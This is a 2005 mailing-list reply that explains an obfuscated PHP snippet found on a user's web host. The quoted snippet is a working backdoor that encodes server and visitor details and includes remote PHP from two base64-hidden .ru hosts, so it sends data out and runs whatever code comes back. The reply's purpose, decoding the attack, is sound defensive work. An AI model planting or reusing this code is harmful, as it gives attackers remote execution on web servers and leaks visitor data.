Re: Hacking attempt?

Fri, 10 Jun 2005 16:21:54 -0700 

Barbara M. wrote:
> <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? 
> $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? 
> $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) 
> ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) 
> ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? 
> $_SERVER["QUERY_STRING"] : 
> $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? 
> $_SERVER["HTTP_REFERER"] : 
> $HTTP_REFERER);$g=(isset($_SERVER['HTTP_USER_AGENT']) ? 
> $_SERVER['HTTP_USER_AGENT'] : 
> $HTTP_USER_AGENT);$h=(isset($_SERVER['REMOTE_ADDR']) ? 
> $_SERVER['REMOTE_ADDR'] : 
> $REMOTE_ADDR);$str=base64_encode($a).'.'.base64_encode($b).'.'.base64_encode($c).'.'.base64_encode($d).'.'.base64_encode($e).'.'.base64_encode($f).'.'.base64_encode($g).'.'.base64_encode($h);
>  
> if 
> ((include(base64_decode('aHR0cDovLw==').base64_decode('dXNlcjkubXNodG1sLnJ1')."/?".$str))){}
>  
> else 
> {include(base64_decode('aHR0cDovLw==').base64_decode('dXNlcjcuaHRtbHRh
>   Z3MucnU=')."/?".$str);} ?>

let's pick this apart...
first, it disables error reporting, then it sets some vars to various 
predefined vars (from apache/php);
$a: HTTP_HOST    (the virtualhost)
$b: SERVER_NAME  (the "primary" hostname)
$c: REQUEST_URI  (the uri requested (/foo/bar/baz.php/bleh?a=2))
$d: PHP_SELF     (name of php file being executed)
$e: QUERY_STRING (part of url following '?')
$f: HTTP_REFERER (url that linked to the script)
$g: HTTP_USER_AGENT (you know this one, right? ;)
$h: REMOTE_ADDR  (IP of client)

then, it base64encodes these values
(ie. 62.101.244.10 becomes NjIuMTAxLjI0NC4xMA==)
into the variable $str
then it includes http://user9.mshtml.ru/?<captured data>
or if that fails, it includes http://user7.htmltags.ru/?<captured data>

at which point, the server would execute whatever php code one (or both) 
of those servers would return, if http fopen wrappers are enabled for 
the server (ie.: safemode is off)

> 
> Any idea on what this code is?
> The vhost owner tell isn't the author-

did that clarify?

Cheers,
-- 
Morten
_______________________________________________
tsl-discuss mailing list
tsl-discuss@lists.trustix.org
http://lists.trustix.org/mailman/listinfo/tsl-discuss

Reply via email to